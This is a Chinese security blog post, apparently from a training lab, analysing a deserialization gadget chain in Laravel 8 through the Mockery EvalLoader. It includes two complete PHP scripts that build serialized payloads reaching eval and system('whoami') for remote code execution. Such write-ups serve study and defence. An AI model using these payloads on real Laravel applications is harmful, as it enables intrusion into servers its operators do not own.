zoukankan      html  css  js  c++  java
  • Laravel 8 反序列化分析

    本文首发于“合天网安实验室” 作者: S1mple

    你是否正在收集各类网安网安知识学习,合天网安实验室为你总结了1300+网安技能任你学,点击获取免费靶场>>

    forward

    laravel的版本已经到了8;这里分析一个laravel8的反序列化漏洞,但是让我感到意外的是,这个漏洞竟然在低版本的laravel上依然可以存在,从根本来说这个漏洞是laravel的mockery组件漏洞,没想到一直没修;

    text

    首先还是老样子,熟悉laravel的pop链的师傅肯定比较熟悉,入口点还是PendingBroadcast.php中的析构函数;

    public function __destruct()
    {
        $this->events->dispatch($this->event);
    }
    

    这里很明显可以控制任意类下的dispatch函数;这里还是选择Dispatcher.php进行续链;

    public function dispatch($command)
    {
        return $this->queueResolver && $this->commandShouldBeQueued($command)
                        ? $this->dispatchToQueue($command)
                        : $this->dispatchNow($command);
    }
    

    这里简单的看下源码,感兴趣的师傅可以拿着laravel5的源码来进行对比,这里只不过是写成了三元运算的形式,本质上还是一样的,我们控queueResolver变量和commandShouldBeQueued函数,使其返回为真,这样就可进入dispatchToQueue函数;这里审计下类不难发现queueResolver是我们可控的变量,然而commandShouldBeQueued函数我们可以追溯一下;

    protected function commandShouldBeQueued($command)
    {
        return $command instanceof ShouldQueue;
    }
    

    这里不难发现,是需要我们的command是继承ShouldQueue接口的类就可;所以全局搜索;选择BroadcastEvent.php的类;然后便可返回true,然后进入dispatchToQueue函数;回溯一下dispatchToQueue函数;

    public function dispatchToQueue($command)
        {
            $connection = $command->connection ?? null;
    
            $queue = call_user_func($this->queueResolver, $connection);
    

    可以发现这里有个危险函数call_user_func;可以直接实现任意类下的任意方法;这里就可直接跳转到我们想要执行的方法下;全局搜索一下eval方法;发现存在;

    class EvalLoader implements Loader
    {
        public function load(MockDefinition $definition)
        {
            if (class_exists($definition->getClassName(), false)) {
                return;
            }
    
            eval("?>" . $definition->getCode());
        }
    }
    

    call_user_func函数在第一个参数为数组的时候,第一个参数就是我们选择的类,第二个参数是类下的方法;所以这里直接去到EvalLoader类,去执行load方法从而调用到eval函数;这里发现存在参数,而且参数必须是MockDefinition类的实例;也即是意味着我们connection需要为MockDefinition类的实例;

    继续审计发现,必须if为false才会触发eval方法;所以这里我们需要直接追溯到MockDefinition类中;

    class MockDefinition
    {
        protected $config;
        protected $code;
    
        public function __construct(MockConfiguration $config, $code)
        {
            if (!$config->getName()) {
                throw new InvalidArgumentException("MockConfiguration must contain a name");
            }
            $this->config = $config;
            $this->code = $code;
        }
    
        public function getConfig()
        {
            return $this->config;
        }
    
        public function getClassName()
        {
            return $this->config->getName();
        }
        public function getCode()
        {
            return $this->code;
        }
    }
    

    看下getClassName函数;这里的config是可控的,所以我们直接找到一个存在getName方法并且可控该方法的类;全局搜索下找到MockConfiguration.php可以实现;

        protected $name;
        public function getName()
        {
            return $this->name;
        }
    

    因为最后是要经过class_exit函数的判断的,所以我们可以直接控制其返回一个不存在的类,就会造成false从而进入eval方法;继续回到eval方法;

    class EvalLoader implements Loader
    {
        public function load(MockDefinition $definition)
        {
            if (class_exists($definition->getClassName(), false)) {
                return;
            }
    
            eval("?>" . $definition->getCode());
        }
    }
    

    这里还有个getCode方法,我们通过上面的类也可审计getCode方法;code在MockDefinition类中也是可控的,所以我们可以随意的控制其内容,那么我们就可命令执行;放出我exp:

    <?php
    
    namespace IlluminateBroadcasting{
    
    use IlluminateContractsEventsDispatcher;
    
    class PendingBroadcast
    {
     protected $event;
     protected $events;
        public function __construct($events, $event)
        {
            $this->event = $event;
            $this->events = $events;
        }
    }
    }
    namespace IlluminateBus{
    class Dispatcher
    {
     protected $queueResolver;
        public function __construct($queueResolver)
        {
            $this->queueResolver = $queueResolver;
        }
    
    }
    }
    namespace IlluminateBroadcasting{
    class BroadcastEvent
    {
     public $connection;
     public function __construct($connection)
        {
            $this->connection = $connection;
        }
      }
    }
    
    namespace MockeryLoader{
    
    use MockeryGeneratorMockDefinition;
    class EvalLoader
    {
         public function load(MockDefinition $definition)
        {}
    }
    }
    namespace MockeryGenerator{
    class MockConfiguration
    { 
    protected $name;
     public function __construct($name){
    
     $this->name = $name;
    }
    }
    
    
    }
    namespace MockeryGenerator{
    
    class MockDefinition
    {
     protected $config;
     protected $code;
     public function __construct($config,$code)
        {
         $this->config = $config;
         $this->code = $code;
        }
    }
    }
    namespace{
     $e = new MockeryGeneratorMockConfiguration('s1mple');
     $d = new MockeryLoaderEvalLoader();
     $f = new MockeryGeneratorMockDefinition($e,'<?php phpinfo();?>');
     $c = new IlluminateBroadcastingBroadcastEvent($f);
     $a = new IlluminateBusDispatcher(array($d,"load"));
     $b = new IlluminateBroadcastingPendingBroadcast($a,$c);
     echo urlencode(serialize($b));
    }
    

    这里为了节省时间,我最后用abcdef直接代替了,造成rce;

    细心的师傅想必也发现了;在最开始的call_user_func处,也是可以进行命令执行的;

    public function dispatchToQueue($command)
        {
            $connection = $command->connection ?? null;
    
            $queue = call_user_func($this->queueResolver, $connection);
    

    这里可以直接控制进行命令执行;这个很简单,就直接放出我exp吧;

    <?php
    
    namespace IlluminateBroadcasting{
    
    use IlluminateContractsEventsDispatcher;
    
    class PendingBroadcast
    {
     protected $event;
     protected $events;
        public function __construct($events, $event)
        {
            $this->event = $event;
            $this->events = $events;
        }
    }
    }
    namespace IlluminateBus{
    class Dispatcher
    {
     protected $queueResolver;
        public function __construct($queueResolver)
        {
            $this->queueResolver = $queueResolver;
        }
    
    }
    }
    namespace IlluminateBroadcasting{
    class BroadcastEvent
    {
     public $connection;
     public function __construct($connection)
        {
            $this->connection = $connection;
        }
      }
    }
    namespace{
     $c = new IlluminateBroadcastingBroadcastEvent('whoami');
     $a = new IlluminateBusDispatcher('system');
     $b = new IlluminateBroadcastingPendingBroadcast($a,$c);
     echo urlencode(serialize($b));
    }
    

    实验:Fastjson反序列化漏洞(合天网安实验室)

    Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

    复制上方链接到浏览器,PC端体验更佳  

    想学习更多CTF技术?加入网安实验室,1300+网安技能任你学!
    合天智汇:合天网络靶场、网安实战虚拟环境
  • 相关阅读:
    POJ 1651:Multiplication Puzzle(区间DP)
    POJ 2955:Brackets(区间DP)
    LightOJ 1422:Halloween Costumes(区间DP入门)
    Gym 101257G:24(尺取)
    Codeforces 777D:Cloud of Hashtags(水题)
    Gym 101257B:2Trees(DFS+思维)
    Codeforces 777C:Alyona and Spreadsheet(思维)
    Codeforces 776C:Molly's Chemicals(思维)
    HDU-3440 House Man
    BZOJ-1202 狡猾的商人
  • 原文地址:https://www.cnblogs.com/hetianlab/p/14510539.html
Copyright © 2011-2022 走看看